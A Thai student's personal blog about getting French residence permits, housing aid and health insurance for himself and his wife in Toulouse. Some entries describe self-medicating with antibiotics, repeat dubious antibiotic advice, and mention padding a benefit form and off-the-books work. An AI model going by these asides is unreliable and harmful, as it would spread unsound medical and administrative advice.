Renew Récépissé

ในวันศุกร์นี้ Récépissé ของบีที่ได้มา มันใกล้จะหมดอายุแล้ว ทาง prefecture ก็ไม่ยอมส่งจดหมายมาให้สักกะที ไม่รู้ว่าช้าที่อะไร ก็เลยลองไป prefecture เองเลย เพื่อไปขอ Renew Récépissé ซึ่งใช้เอกสาร 3 อย่างคือ
1. Récépissé ตัวจริง
2. Passport ตัวจริง
3. รูปถ่าย ขนาดเกือบ 2 นิ้ว

ก็ต่อแถวประมาณเกือบ ๆ 1 ชม. (ซึ่งถือว่าเร็วแล้ว) ก็ถึงคิวเรา เค้าก็ได้ทำ Récépissé ให้ใหม่ โดยแจ้งว่าที่ยังไม่ได้รับ จม. ให้ไปรับ Carte de sejour ก็เพราะว่า ผมไม่ได้เอา จม. จาก prefecture ที่ต้องติดแสตมป์ 5 ดวง (275 ยูโร) ให้ Prefecture อ้าว?? แล้วกรูจะให้มรึงได้ตอนไหนวะเนี่ย? ก็หลังจากไปตรวจร่างกายที่ ANAEM เค้าก็บอกว่าให้รอ จม. เลย แล้วทาง ANAEM ก็ไม่ได้เก็บจม. นี้ไปด้วย ไม่เหมือนตอนของผมเอง ที่ได้ carte de sejour ที่ ANAEM เลย

เอาวะ ก็ไม่เป็นไร เพราะจะถามเค้าว่ายื่นเอกสารนี้ตอนไหนก็ลำบาก ก็ได้ข้อสรุปมาว่า เค้าบอกให้รออีกไม่น่าจะเกิน 1-2 เดือน ทาง prefecture จะส่ง จม. ให้ไปรับ carte de sejour ตัวจริง และก็ ออก Récépissé ให้ใหม่ ก็ O.K. ไว้ได้จม. จากทาง prefecture ค่อยมารับ carte de sejour อีกรอบครับ

ตากุ้งยิง

เมื่อสัปดาห์ที่ผ่านมา บีเป็นตากุ้งยิง ผมก็ให้กิน Amoxyciline + ยาหยอดตา ที่พกมาจากเมืองไทย + เอาน้ำอุ่นประคบ ผ่านไปประมาณ 4-5 วัน ก็หายเป็นปรกติ ก็นึกว่าไม่เป็นไรแล้ว สักพัก กลับมาเป็นใหม่ ผมก็เลยตัดสินใจพาบีไปหาหมอ

ช่วงนั้นโชคดี ที่เราจัดการ LMDE เสร็จเรียบร้อยพอดี ทำให้เราสามารถเบิกค่าใช้จ่ายได้ทั้งหมด เมื่อไปหา กว่าจะได้ตรวจก็รอคิวประมาณเกือบ ชม. การพูดคุยก็ค่อนข้างลำบาก เพราะ คิดว่าหมอพูดภาษาอังกฤษได้ ปรากฎว่า หมอดันพูดภาษาอังกฤษไม่ได้ ต้องไปหาล่าม คือ คนไข้ คนอื่น มาช่วยพูดให้แทน (อะไรวะ อุตส่าห์เรียนจบหมอ พูดอังกฤษไม่ได้)

เมื่อตรวจเสร็จหมอก็จ่ายยาหยอดตา กับ ยาทาตามาให้ ก่อนที่จะมาหาหมอ ผมได้สอบถามเพื่อนที่เป็นหมอ และ เภสัช มาได้ คำแนะนำว่าให้กินยา Diclociline ซึ่งจัดเป็นยา Anti-Biotic (ยาฆ่าเชื้อ) ที่มีผลกับโรคตาแดงโดยตรง ส่วน Amoxy นั้น ช่วยเพียงแค่ประมาณ 20% เท่านั้น แต่หมอ ไม่ยอมจ่ายยาตัวนี้ให้ เหมือนกับที่เพื่อนบอกว่าไว้เลย ว่าหมอที่นี่ แม่ง จ่ายยาฆ่าเชื้อยาก ต้องให้เราเป็นหนัก ๆ ก่อน คือ ลองให้ร่างการรักษาตัวเอง ก่อน ถ้าไม่ไหวจริง ๆ จึงจะจ่าย

เมื่อตรวจเสร็จแล้วก็จ่ายค่าตรวจไป 22 ยูโร โดยผมออกเงินไปก่อน แล้วค่อยไปเบิกกับ LMDE คืนทีหลัง ก็ได้ไบสั่งยา จากนั้นก็นำไปซื้อยาที่ร้านขายยาทั่วไป ก็ได้ยามาฟรีเลย ร้านเคยยา พอเห็นประกันที่ทำกับ LMDE เค้าก็ไม่เก็บเงินเลย คนในร้านขายยาก็ยังพูดภาษาอังกฤษได้บ้างดีจังเลย ค่ายาหยอดตา กับ ยาทา ประมาณ 10 ยูโร นี่ ถ้าเทียบกับบ้านเราเนี่ย ไม่น่าจะเกิน 100 บาทนะ

หลังจากทาไปได้สักพัก อาการก็ดีขึ้นเหมือนจะหายแล้ว แต่ก็ยังไม่หายสักกะที เดี๋ยววันพรุ่งนี้จะลองไปหาหมออีกรอบครับ

STOP Work!

บีหยุดทำงานประจำที่ร้านตั้งแต่เมื่อวานแล้ว สาเหตุเนื่องเพราะว่า วีซ่าบี เป็นวีซ่าที่เป็นแบบผู้ติดตาม ซึ่งในแบบฟอร์มการขอ Carte de sejour เขียนไว้ชัดเจนเลยว่า ห้ามทำงาน (นอกจากแอบทำ) แต่ทางเจ้าของร้านเค้าก็กลัวว่าจะถูกรัฐบาลจำได้ ซึ่งโทษหนักถึงขั้นปิดร้าน + ยึดใบกิจการเลยทีเดียว บีก็เลยไม่ได้ทำงานที่นั่นประจำ แต่ก็รับงานมาทำที่บ้าน เช่น ห่อเกี้ยว เป็นต้น ก็ยัง O.K. มีรายได้นิดหน่อย

ถ้ามาในฐานะ นักศึกษาจะ สามารถทำงานได้ (ผมสามารถทำงานได้แต่จำกัดชั่วโมง) แต่ผมก็ลองคิด ๆ ดู ถึงแม้มาในฐานะ นักศึกษา ก็ลำบากอยู่ดี (ยิ่งถ้านับตั๋วเครื่องบินกลับไปยิ่งไม่คุ้มใหญ่) ปรกติแล้ว วีซ่าจะไม่สามารถเปลี่ยนประเภทได้ นอกจากจะกลับไปขอใหม่ที่เมืองไทย ซึ่งขั้นตอนนี้แค่คิดก็ไม่คุ้มแล้ว และถ้ามาแบบนักเรียน ก็คงต้องไปสมัครเรียนที่ มิไค (โรงเรียนสอนภาษาฝรั่งเศสในตูลูส) เพราะว่าค่าลงทะเบียนจะถูกกว่าที่อื่น ประมาณ 300 ยูโร ต่อปี แต่ก็ไม่ใช่ว่าเข้าได้ง่าย ๆ อย่างน้อยก็ต้องพูดภาษาฝรั่งเศสได้พอควร และ หากสถานะนักศึกษาหมดหมดเมื่อไหร่ก็ต้องถูกส่งกลับประเทศอยู่ดี และ การขอเงินคืนค่าบ้านจาก CAF บีมาในสถานะผู้ติดตาม ผมสามารถขอเงินจาก CAF ได้เยอะพอสมควร เท่าที่คำนวนดูใน web ของ CAF ก็เกิน 50% เลยทีเดียว แต่ต้องรอดูอีกที ว่า CAF จะให้เท่ากับที่คำนวนใน web หรือเปล่า ดังนั้นเมื่อคำนวนดูแล้ว ถ้ามาในสถานะผู้ติดตามได้ ก็มาในสถานะนี้ จะดีกว่าครับ หางานมาทำที่บ้านเล็ก ๆ น้อย ๆ + ใช้จ่ายประหยัด ๆ ตามเศรษฐกิจพอเพียง ของในหลวงของเรา ก็อยู่ได้ครับ :-)

Titre de sejour

วันที่ 31 ตุลาคม 2551 ผมมีนัดกับ ANAEM ให้ไปตรวจสุขภาพเพื่อขอ Carte de sejour ( หรือ Titre de sejour นั่นแหละ อันเดียวกัน) เหมือนกับครั้งที่ผมพาบี เราเดินทางกันไปตั้งแต่ 8.30 น. ไปถึงที่ ANAEM ที่สถานี La Vache (Ligne B) เวลา 8.55 น. ผมก็ตรวจสุขเหมือนกับที่บีได้ตรวจ คราวนี้เวลาคุยกับเจ้าหน้าที่ก็สบาย ๆ เลย เพราะรู้แล้ว ว่าจะได้อะไรบ้าง ไม่มีปัญหาอะไร เมื่อให้ข้อมูลเรียบร้อย ผมก็ไป X-Rays ปอด แล้วก็รอรับฟิล์ม X-rays จากนั้น เค้าก็บอกว่าให้รอรับเจ้าตัวใบรับรองสุขภาพ ผมก็รออยู่สักพักหนึ่งเข้าก็เรียกเข้าไปรับในห้อง และแล้วสิ่งที่ไม่คาดฝันก็เกิดขึ้น ปรากฎว่าผมได้รับ Titre de sejour วันนั้นเลยครับ งง แฮะ ไม่ต้องไปต่อแถวรอที่ Prefecture อีก ซึ่ง Titre de sejour มีอายุ 1 ปี เมื่อหมดอายุเมื่อไหร่ ก็ต้องไปติดต่อ Prefecture เพื่อขอเจ้า Titre de sejour ใหม่อีกรอบ คราวนี้ผมก็เตรียมนำเจ้าเอกสารตัวนี้ไปยื่นให้ CAF เพื่อขอเงินค่าบ้านคืน ก็หลายยูโรอยู่ทีเดียว

ANAEM เนี่ย ก็จัดเป็นที่หนึ่งที่ให้บริการดีเลยทีเดียวครับ ขอชมเชย :-)

จากน้ันก็ไป LMDE ต่อ เพราะค่าประกันสุขภาพของบี ยังไม่เรียบร้อย เมื่อไปที่ LMDE เค้าก็บอกว่าต้องให้ CROUS ทำจดหมายรับรองให้บี มาอีกครั้งหนึ่ง ถึงจะได้ ผมก็เลยต้องไปที่ CROUS ใหม่ ก็คุยกันลำบากพอสมควร เนื่องจากฟังไม่ค่อยรู้เรื่อง แต่ก็สรุปใจความได้ว่า CROUS จะทำจดหมายไปให้ LMDE แล้วให้ผมรออีก 2 สัปดาห์จึงไปติดต่อ LMDE อีกที ซึ่งคิดว่าคราวนี้คงจะได้ประกันสุขภาพของบีแล้ว และจะมี update ใหม่นะครับ

New Job!!

วันนี้ก็เป็นวันแรกที่ ผมได้พาบีไปลองงานที่ร้าน สุโขทัย ณ ตูลูส ซึ่งงานหลักของบีก็คือช่วยแม่ครัวเตรียมอาหาร + ล้างจาน (แต่จะเน้นล้างจานมากกว่า) ส่วนผมก็ไปช่วย ๆ เค้าเพื่อตีสนิทไว้ก่อน และยังได้ดูลาดราว เพื่อจะรับ job เล่นดนตรี ซึ่งหลังจากที่คุยกับเจ้าของร้าน (ชื่อพี่ Ed) เค้าก็ O.K. ครับ ผมต้องกลับมาเตรียมเพลงไว้ก่อนจะไป audition จริง ๆ คงได้แกะเพลงฝรั่งเศสเล่นกันมั่งละวะ งานนี้

ในร้านบรรยากาศตกแต่งสวยงาม ในแบบไทย ๆ พนักงานในร้านมี กันประมาณ 3-4 คน ตอนเที่ยง ๆ วันนี้ คนก็ยังมาไม่เยอะมากนัก ทยอยกันมาเรื่อย ๆ ประมาณ 9 คน ก็สั่งอาหารแบบเป็นชุด เป็นส่วนมาก แขกส่วนมากเป็นคนฝรั่งเศส หลังจากที่เค้าทานอาหารไทย เท่าที่สังเกตส่วนใหญ่ก็ชอบนะ ทานกันหมดเกลี้ยงเกือบทุกคน ทานเหลือบางคนเท่านั้น แสดงว่าร้านนี้ อนาคต น่าจะ O.K. ผมก็เลยเชียร์ให้บีตกลงทำงาน ก็เข้างาน 11.30 น. เลิกก็ประมาณ บ่าย 3 โมง วันนี้หลังจากเลิกงาน ก็ได้รับเงินค่าจ้าง 10 ยูโร + แขกให้ทิป อีก 1 ยูโร ก็ดีนะ ดีกว่าอยู่เปล่า ๆ ได้เงิน ได้งาน ได้รู้จักคน ได้ประสบการณ์ด้วย หลังจากนี้ไป บี ก็มีงานทำแล้ว เย้.. :-)

VACCINE

ช่วงเช้า ผมก็เอา LMDE ที่ได้รับจดหมายเมื่อวันศุกร์ ไปให้หมอกรอกเอกสาร คล้าย ๆ กับว่า เราเลือกหมอไว้ก่อน หากเป็นอะไร ก็มาหาหมอคนนี้ได้ ก็เลยหาคลีนิคหมอที่ใกล้ ๆ กับ มหาวิทยาลัย เข้าไปปุ๊บก็ต้องนั่งรอ ร้อ รอ......รอ รอประมาณเกือบ 1 ชม. เข้าไปหาหมอก็กรอกเอกสาร ใช้เวลาประมาณ 5 นาที เสร็จ (แม่ง กรูต้องรอนานตั้ง 1 ชม.) เพราะว่าที่นี่ ค่าแรงมันแพงมาก หมอก็เลยไม่ได้จ้างใครเลย เค้าทำเองทุกอย่าง ตั้งแต่ นัดคนไข้ ตรวจคนไข้ เขียนใบสั่งยา จ่ายยา ทุกอย่าง ยิ่งหมอฟัน ยิ่งมือโปร ใหญ่ sucker สำหรับดูดน้ำลายพี่แกยังถือเองเลยน่ะ หมอฟันบ้านเราสู้ได้ป่าว หึ ๆ ๆ

ช่วงบ่าย หลังจากที่ไปจัดการธุระที่ ANAEM เสร็จเมื่อวันศุกร์ ผมก็พาบีไปฉีดยาป้องกันโรค ที่ Centre de Vaccination International ณ. Service Communal D'Hygiene et de sante เพื่อขอ Certificat de vaccinations จริง ๆ แล้วก็ไม่ได้อยากฉีดมากนักหรอก แต่เพื่อความชัวร์ในการขอ Carte de sejour เพราะ ในจดหมายมันบอกว่า ต้องเอาใบรับรองวัคซีนมาแสดงด้วย ก็เลย ฉีดซะเลยไหน ๆ ก็ฉีดฟรี ก่อนที่จะฉีดก็นั่งรอประมาณเกือบ ๆ ชม. ซึ่งไม่ถือว่านานมาก (เพราะไม่ได้นัดมาก่อนด้วย) สำหรับการมาติดต่อหน่วยงานราชการของฝรั่งเศส ผมคิดว่าพอรับได้ครับ (ไอที่รอนาน บริการห่วยที่สุดก็เป็น Prefecture นี่แหละครับ) หมอที่ฉีดยา ก็ใจดี คุยดี แล้วก็มือเบามาก ก่อนฉีด บี กลัวเข็มมาก แต่พอฉีด ไม่เจ็บเลย สบายหายห่วงครับ เนื่องจากห่างหายจากการฉีดยามานานเกิน 10 ปี จึงโดนไป 2 เข็ม และต้องเว้นช่วง 1 เดือน วันนี้เลยฉีดแค่เข็มเดียวก่อน แล้ว วันที่ 20 พย. 51 หรือหลังจากวันนั้น ค่อยมาต่ออีกเข็ม ฮา ๆ

ระหว่างเดินหาร้านก็ผ่านร้านขายกีต้าร์ด้วย ไว้ว่าง ๆ จะเอารูปมา upload ให้ดู (ติดตามได้ใน http://guitarist.vze.com/ )

ช่วงเย็น รุ่นพี่มาบอกว่า ร้านอาหารไทย "สุโขทัย" เข้ากำลังหาคนทำงาน ผมก็เลย พาบี ไปสมัครงานซะเลย วันพรุ่งนี้จะเป็นวันทดลองงาน ไม่รู้ว่าจะผ่านหรือเปล่า ไว้ได้ผลยังไง จะมาเล่าให้ฟังอีกทีนะครับ วันนี้ไว้แค่นี้ก่อนละกัน

ANAEM

เมื่อวาน เมื่อถึงกำหนดต้องไปเอาไปรับรองการตรวจร่างกายที่ ANAEM ผมก็ทำการหาเส้นทางจาก http://maps.google.com ก็พบว่า ต้องนั่งรถไฟฟ้าสาย B ไปลงที่ สถานี La Vache

ผมและ บี ออกเดินทางตอน บ่ายกว่า ๆ โชคดี วันนั้นเป็นวันที่ จดหมาย LMDE มาถึงพอดี และก็ได้ใช้ด้วย

ผมนั่งรถไฟฟ้าไปที่สถานี La Vache ตามที่ Google บอกไว้ จากนั้นก็เดินต่อไปที่ ANAEM ดูจากในแผนที่ก็ค่อนข้างไกล แต่พอไปถามคนแถวนั้น ก็พบว่า ไม่ไกลมาก เดินไป 5 นาทีก็ถึงแล้ว สถานที่กว้างใหญ่สบาย เข้าไปปุ๊บ เข้าก็ให้นั่งรอแป๊บนึง แล้วก็เดินเข้าไปคุยกับพนักงาน เค้าก็พูดภาษาอังกฤษได้นิดหน่อย ผมก็เดาออกบ้างไม่ออกบ้าง แต่เค้าก็ใจดี ไปนำเพื่อนที่พูดภาษาอังกฤษได้ดี (แถมน่ารักด้วย) จึงสื่อสารกันเข้าใจ :-)

ก่อนที่จะไป ANEAM ผมก็ซื้ออากรแสตมป์ (timbre) 275 ยูโร คนขาย ก็งง ทำไม ซื้อตั้ง 5 ดวง (ดวงละ 55 ยูโร) ปรกติ ซื้อกันดวงเดียว สำหรับ 1 ดวงใช้กรณีของนักเรียนครับ ถ้าเป็นบุคคลทั่วไป ทำครั้งแรกใช้ 5 ดวง ซึ่ง แสตมป์นี้ เราจะใช้ตอนที่ไปรับ Carte de sejour ครับ ไม่ได้ใช้ตอนที่ไป ANEAM

สรุปใจความได้ว่า บี จะได้รับการ X-rays (เอ๊กซเรย์) ปอด แล้วก็ได้ใบรับรองสุขภาพ ซึ่งเอาใบนี้แหละ ในการไปยื่นขอ Carte de sejour ที่ Prefecture ต้องรอจดหมายจาก Prefecture อีกประมาณ 2-3 สัปดาห์ แล้วก็ให้ไปฉีดวัคซีนป้องกันโรคต่าง ๆ (เป็นนโยบายของประเทศนี้ เค้าจะมีกำหนดไว้เลย ว่าอายุเท่าไร ฉีดอะไรบ้าง) แต่ก็ไม่ได้บังคับ ว่าจะไปฉีดหรือไม่ฉีดก็ได้ ยังไงก็ได้ Carte de sejour แต่เพื่อความปลอดภัย ทั้งของร่างกายเรา และ ความปลอดภัยในการขอ Carte de sejour ผมก็เลย แนะนำให้ไปฉีดดีกว่า ยังไงก็ฟรี ทุกอย่าง (รวมทั้งค่า X-rays ด้วย)

ตอนนี้ก็แค่เตรียมตัว ไปรับ Carte de sejour แล้ว จะมาแจ้งให้ทราบอีกครั้งครับ

CAF ขอเงินค่าบ้าน

หลังจากที่ลองคำนวนดูคร่าว ๆ ค่าเช่าบ้านเดือนละ 413 ยูโร ผมลองไปที่ http://www.caf.fr/ เพื่อคำนวนเงินที่จะได้รับการสนับสนุนจากรัฐบาลฝรั่งเศส คำนวนได้ประมาณ 304 ยูโร เยอะใช้ได้เลย วันนี้ผมเตรียมเอกสารพร้อมแล้ว และ จะไปยื่นที่ CAF มีจุดให้บริการ 2 จุด หลังจากที่ได้สอบถาม ก็ทราบว่า ในส่วนที่เข้าแถวต่อคิว นั้นเป็นของ พวกที่มีรายได้น้อยและไม่ได้เป็นนักเรียนที่จะขอช่วยจาก CAF

ในส่วนของผม (จัดเป็นพวกไม่มีรายได้) ก็ไปอีกจุดหนึ่ง ซึ่งวันนี้ไม่มีคนเลยแฮะ ทางโล่งสะดวก ไปถึง เค้าก็พูดคุยดี ฟังไม่ยาก (โชคดีเจอคนใจดี) เค้าก็ตรวจเอกสาร แล้วก็บอกว่า Carte de sejour หลังจากที่ได้ตัวจริงแล้ว ให้เอามายื่นให้ด้วยนะ พอตรวจเสร็จหมดแล้ว ก็เก็บเข้าแฟ้ม แล้วก็บอกว่าเสร็จแล้ว เดือนหน้า รอรับเงินในบัญชีได้เลย

เฮ้ย!! ทำไมมันง่ายอย่างงี้วะ!! ตั้งแต่ติดต่อหน่วยงานของฝรั่งเศส ไม่มีที่ไหนแล้ว ที่สะดวกที่สุดเท่า CAF @ Toulouse หลักฐานจากเจ้าของบ้านก็ไม่ต้องใช้ แค่ให้เจ้าของบ้านกรอก Attestation (แปลว่าใบรับรอง) ที่เรา Print ไปเท่านั้นเอง สะดวกโคตร ๆ ^_^

แต่ตอนที่ไปกรอกใน web ของ CAF เนี่ย เหนื่อยเอาเรื่อง เพราะมีแตคำศัพท์ และ คำย่อ หลายอย่างที่เราไม่เข้าใจตรึมเลย เดา ๆ ไป ตรงไหนเป็นรายรับกรอก 0 หมด แล้วก็เน้นว่าเป็นนักเรียนทุน CROUS จะได้ ได้เงินคืนมาเยอะ ๆ หึ ๆ ๆ

ตอนนี้ใบนัดตรวจสุขภาพเพื่อทำ Carte de sejour ของ บี ก็ส่งคืนมาให้แล้ว (ทำไม ทำหลังได้ก่อนวะ) นัดเจอกันศุกร์นี้ ต้องติดแสตมป์ 275 ยูโรแหนะ ( ประมาณ 14,xxx บาท ) เอาวะ เพื่อให้ได้อยู่ในประเทศเค้าก็ต้องยอมจ่าย

Prefecture #2

วันนี้เป็นวันอังคาร หลังจากยุ่งยากกับการเตรียมเอกสารสำหรับทำ Carte de sejour ให้ แฟน และไปเที่ยว Montpellier ที่พี่ชาย เรียนอยู่ เสร็จแล้ว ก็เตรียมตัวจะไปส่งเอกสาร เพราะคิดว่าวันนี้คนคงจะไม่เยอะเหมือนวันจันทร์ พอไปถึงที่นั่นเวลา 9.30 น. คนแถวก็ประมาณสัก 15 คนเห็นจะได้ เออคิดว่าไม่น่าจะยืนรอนาน แต่ไป ๆ มา ๆ ผ่านไป 1 ชม. แถวเพิ่งขยับไปนิดหน่อยเอง แล้วคนก็มารอต่ออีกพรึบ ผมก็เลยลองจับเวลาดู ก็ได้ค่าเฉลี่ย ของการ Service 1 คน ใช้เวลาประมาณ 10 - 15 นาที โอ้ แบบนี้ มีคนก่อนหน้าผมประมาณ 15 คนก็ รอประมาณ 3 ชม. สิครับเนี่ย -_-"

แล้วผมก็ลองมองย้อนไปข้างหลัง โอ้ เดี๋ยว 12.0o น. ก็พักเที่ยงแล้ว เปิดให้บริการอีกทีก็ 14.00 แล้วก็ปิดทำการ 15.00 แล้วไอคนที่อยู่ข้างหลังมันจะได้ทำทันได้ยังไงกันเนี่ย?

และแล้ว โชคก็เข้าข้าง มีเจ้าหน้าที่ผู้หญิงคนหนึ่งเดินมาตรวจสอบว่าใครเอกสารครบแล้วบ้าง ก็ให้บัตรคิว (แซงคิวนั่นเอง) ไปนั่งข้างในเพื่อรอทำ Carte de sejour ได้เลย ปรากฎว่า ผมได้บัตรคิวด้วยแฮะ ลัดคิวไปได้ประมาณ 5 คน (ก็หลาย ชม. อยู่นะ) เสร็จแล้วก็ส่งเอกสาร เจ้าหน้าที่ขอดูเอกสารตัวจริงด้วย แต่ผมเอาไปแค่บางอย่าง เค้าก็ O.K. ไม่ถึงกับ serious มาก (แต่เอาไปหมดปลอดภัยกว่านะ) จากนั้นก็ Print บัตร Carte de sejour ชั่วคราวให้ เย้... ในที่สุดก็ได้แล้ว เดินออกมาจาก Prefecture

ก่อนออก มองดูแถวที่ยาว ๆ แล้วน่าสงสารคนที่ไปยืนเข้าแถวจัง ไอองค์กรห่วย ๆ แบบนี้ เมื่อไหร่มันจะปรับปรุงสักทีนะ แต่คนที่บริการข้างใน ที่เป็นคนทำ Carte de sejour เค้าคุยดีนะ แต่ไอการบริหารจัดการขององค์กรเนี่ยแหละ ห่วยแตกมาก ๆ ให้คนมายืนรอเสียเวลา > 3 ชม. เพื่อส่งเอกสาร บ้าไปแล้ว ของผมโชคดี รอแค่ ชม. กว่า ๆ ถึงจะอ้างว่าไม่อยากให้คนเข้าประเทศฝรั่งเศสเยอะ ๆ ก็เหอะ ก็น่าจะใช้วิธีการบริหารจัดการวิธีอื่น ไม่ใช่ ใช้วิธีมาให้รอคิวยาว ๆ เสียเวลาทำการทำงานหมด เก็บเงินค่าทำ carte de sejour ก็ 275 ยูโร ( หมื่นกว่าบาท) ไม่ใช่ถูก ๆ นะเนี่ย เอาไปจ้างคนตรวจเอกสารให้มันเยอะกว่านี้หน่อยไม่ได้ (หรือไงวะ?) :(

และก็ผ่านไปด้วยประการเช่นนี้ครับ ขอบ่นหน่อย ยังแหลงฝรั่งเศสไม่ชัด บ่นใน blog แทนไปก่อน ฮ่า ๆ ๆ

เหตุผลสำหรับแฟน (French Language)

เวลาเขียนขอ VISA ให้แฟน เพื่อที่จะไปอยู่ประเทศฝรั่งเศสด้วยกัน มันช่างคิดประโยคที่สวยหรู ที่เป็นภาษาฝรั่งเศส ยากจริง ๆ ผมก็เลยไปถามเพื่อนที่อยู่ใน LAB ด้วยกัน ได้ความว่าดังนี้ครับ

Renseignements concernant le séjour en France
Pour quelles raisons demandez-vous un titre de séjour en France:

=>
Pour des raisons de regroupement familliale, mon époux M. Warodom WERAPUN fait ses études en France et poursuivre son doctorat ici.

คำแปล ลองไปใส่ใน translation.google.com ก็จะทราบเองครับ

นอกจากใช้ขอ VISA แล้ว ยังต้องใช้ เวลาไปขอ Carte de sejour ด้วยครับ
(อย่าลืมเปลี่ยนชื่อผมด้วยละ) ^_^

[ เข้าประเทศฝรั่งเศสเมื่้อ 06/09/2008 - 06 sep 2009 ]
ขอบันทึกไว้หน่อย เพราะกรอกทีไร ลืมวันเข้าประเทศต้องไปหาจากตั๋วเครื่องบินทุกที

คำถามจาก อ.โก้ เกี่ยวกับเอกสารไปฝรั่งเศส

วันนี้ผมไปจัดการเอกสารที่ CROUS ที่ว่าต้องแก้จาก doctorat เป็น master 2 recherche เสร็จพอดี เหนื่อยเหมือนกันเสร็จแล้วก็แวะไปซื้อผ้าห่มแบบนวม ราคา 55 ยูโร แก้หนาวต่อ พอดีมัน sale จาก 80 ยูโร แหนะครับบางยี่ห้อ ขายตั้ง 419 ยูโร ผ้าบ้าอะไรวะ 2 หมื่นกว่าบาท -_-" จากนั้นก็มาอ่าน email ก็เจอคำถามที่คิดว่าน่าจะมีประโยชน์กับคนอื่น ๆ ที่อาจสงสัยคล้าย ๆ กัน เลยขอ มา post ไว้ที่นี่ละกันนะครับ

2008/9/17 Chakkrit P <pchakkrit at gmail.com>
สวัสดี..เปิ้ลพอดีวุ่นๆ อยู่หลายอย่าง วันนี้เริ่มเตรียมเรื่องเอกสารที่จะต้องนำไป เลยนึกขึ้นได้อยากถามเกี่ยวกับเอกสารที่ต้องนำไปหน่อยน่ะ

1. เอกสารที่แปลเป็นภาษาฝรั่งเศสนั้นจะต้องมีการประทับตราจากสถาทูตรับรองอีกหรือไม่?ผมให้ทางคณะอักษรศาสตร์จุฬาเป็นคนแปล และตอนนี้มีการปั๊มตรารับรองจากจุฬาแล้ว

ถ้าที่อักษรจุฬา เค้าผ่านการรับรอง จากสถานฑูต ในการแปลเอกสารแล้ว ก็คงไม่น่าจะมีปัญหานะครับ ลองถามที่ จุฬาดูอีกทีครับ แต่ผมคิดว่าคงได้ เพราะถ้าเค้าไม่ผ่าน การรับรอง เค้าคงไม่รับแปลให้ครับ อีกอย่างถ้าไม่ได้แปลจากสมาคมฝรั่งเศสที่นี่ เค้าก็ไม่ปั้มตราให้อยู่แล้วครับ นอกจากว่าจะแปลใหม่กับเค้า และก็จ่ายเงินใหม่ครับ

2. การไปยื่นเอกสารต่างๆ ไม่ว่าจะเป็นที่ CROUS,มหาวิทยาลัย ฯลฯ ต้องใช้ตัวจริงทั้งหมดมั้ย?ถ้าถ่ายเอกสารไปได้หรือไม่?

เผื่อความปลอดภัยควรนำตัวจริงมาด้วยครับ ผมก็เอาตัวจริงมาทั้งหมดครับ แต่ก็นั่นแหละ เวลายื่นเอกสาร ยังไม่เห็นที่ไหนใช้ตัวเอกสารตัวจริงเลย (นอกจาก passport) และ เอกสารตัวจริง ของเราส่วนมากเป็นภาษาไทย ให้เค้าดูไปเค้าก็ดูไม่รู้เรื่องหรอก ขนาดภาษาอังกฤษยังจะพูดกันไม่ค่อยจะได้ ไม่ต้องนึกถึงภาษาไทยเลยครับแบบนี้

3. ปกติที่โน้นเขาต้องมีการเซ็นต์สำเนาถูกต้องเหมือนบ้านเรามั้ย ?

มีครับ ใช้คำว่า "lu et apprové" แต่เอกสารที่เราส่งไปส่วนมากก็ไม่ต้องรับรองทั้งหมดครับ เวลาเขียนประโยคนี้ ส่วนมากใช้ในกรณี เปิดบัญชี ธนาคาร กับทำ carte de sejour ซึ่งเราเขียนในเอกสารที่เค้าจะส่งมาให้เรากรอก ไม่ใช่เอกสารที่เราเตรียมไปครับ

4. บัตรประชาชน, บัตรข้าราชการ (ตัวจริง) จำเป็นต้องนำไปด้วยหรือไม่?

ไม่ใช้เลยครับ (เพราะว่าเป็นภาษาไทย) แต่ผมว่า นำติดตัวมาดีกว่า มันก็ไม่ได้หนักมาก เผื่ออาจจะใช้ในอนาคต ครับ

5. transcript ที่เป็นภาษาอังกฤษ จำเป็นต้องนำตัวจริงไปด้วยหรือไม่?

ใช้ครับ ทั้ง transcript + ใบรับรองปริญญาที่เป็นภาษาอังกฤษ (อย่าลืม เอาของ ป. ตรี มาด้วยนะครับ) ใกล้จะมาเต็มที่แล้ว ตื่นเต้นมั้ยครับ ช่วงนี้มีคำถามอะไรก็ถามมาได้เลยนะครับ ผมมีห้องใช้ internet ส่วนตัวแล้ว

ช่วงนี้ อากาศเริ่มหนาวแล้วนะครับ (แต่ฝนไม่ค่อยตก) อย่าลืมเสื้อหนาว ถุงมือ ถุงเท้า ซักชุดพกติดตัวมาก่อนแล้วค่อยไปหาของดี ๆ ที่นี่เวลามัน sale ถ้าซื้อราคาเต็มแพงเอาเรื่องเหมือนกันนะครับพวก brand name ดี ๆ ราคาเป็นหมื่นกว่าบาท แต่เวลา sale เหลือประมาณ 1-2 พันบาทเองผมเลยแนะนำว่าเตรียมมาสักชุด ระหว่างรอซื้อของ sale ครับ

Prefecture #1 + EDF

วันนี้ ผมได้ไปทำ carte de sejour หลังจากได้เอกสารบางส่วนมาเพิ่มเติม ไปที่ prefecture โอ้ คนเยอะ สมคำล่ำลือจริง ๆ คิวยาวมาก แม่ง คนรับเอกสารมีอยู่คนเดียว แต่เนื่องจากผมเป็นนักเรียนทุนของ CROUS ผมก็เลยต้องไปทำ carte de sejour ที่ CROUS แทน โดยนัดทาง internet แล้วก็ไปทำ ก็รอไม่นานมาก เพราะนัดแล้ว ยังดีนะที่เจ้าหน้าที่พอ parle anglais ได้บ้าง ไม่งั้นก็ลำบาก คุยไม่ค่อยรู้เรื่องอีก

หลักฐานที่ผมใช้ตอนทำ carte de sejour ของ นร. ทุน CROUS มีดังนี้
- รูปถ่าย 2 นิ้ว 3 รูป
- ใบแปลสูติบัตร
- ใบทุนของ CROUS
- ใบตอบรับจากมหาวิทยาลัย หรือ บัตร นร.
- ใบแปลแต่งงาน
- สำเนาวีซ่า
- สำเนาพาสปอร์ต
- อากรแสตมป์ (เค้าเรียกว่า timbre) ซึ่งไปซื้อที่ได้ที่ร้าน tabac อยู่ใกล้ ๆ กัน ราคา 55 ยูโร
- ใบเสร็จค่าไฟฟ้า (หรือ EDF ที่ผมเคยเล่าก่อนหน้านี้นี่เอง) เพิ่งมาอยู่มันจะมี บิลนี้ ได้ยังไงว่ะ? แต่อันนี้เค้าอนุโลมให้ แค่เอาหลักฐาน สัญญาเช่า ไปแทนก่อนได้

เมื่อทำเสร็จแล้ว ผมก็ได้ carte de sejour แบบชั่วคราว (จำชื่อเรียกไม่ได้แฮะ) ซึ่งจะมีอายุประมาณ 3 เดือน จากนั้น ภายใน 3 เดือนนี้แหละ เค้าจะ นัดผมอีกครั้ง เพื่อให้ไปตรวจสุขภาพ และ รับ carte de sejour ตัวจริง ๆ แทน ตอนนี้ก็รอไปก่อน

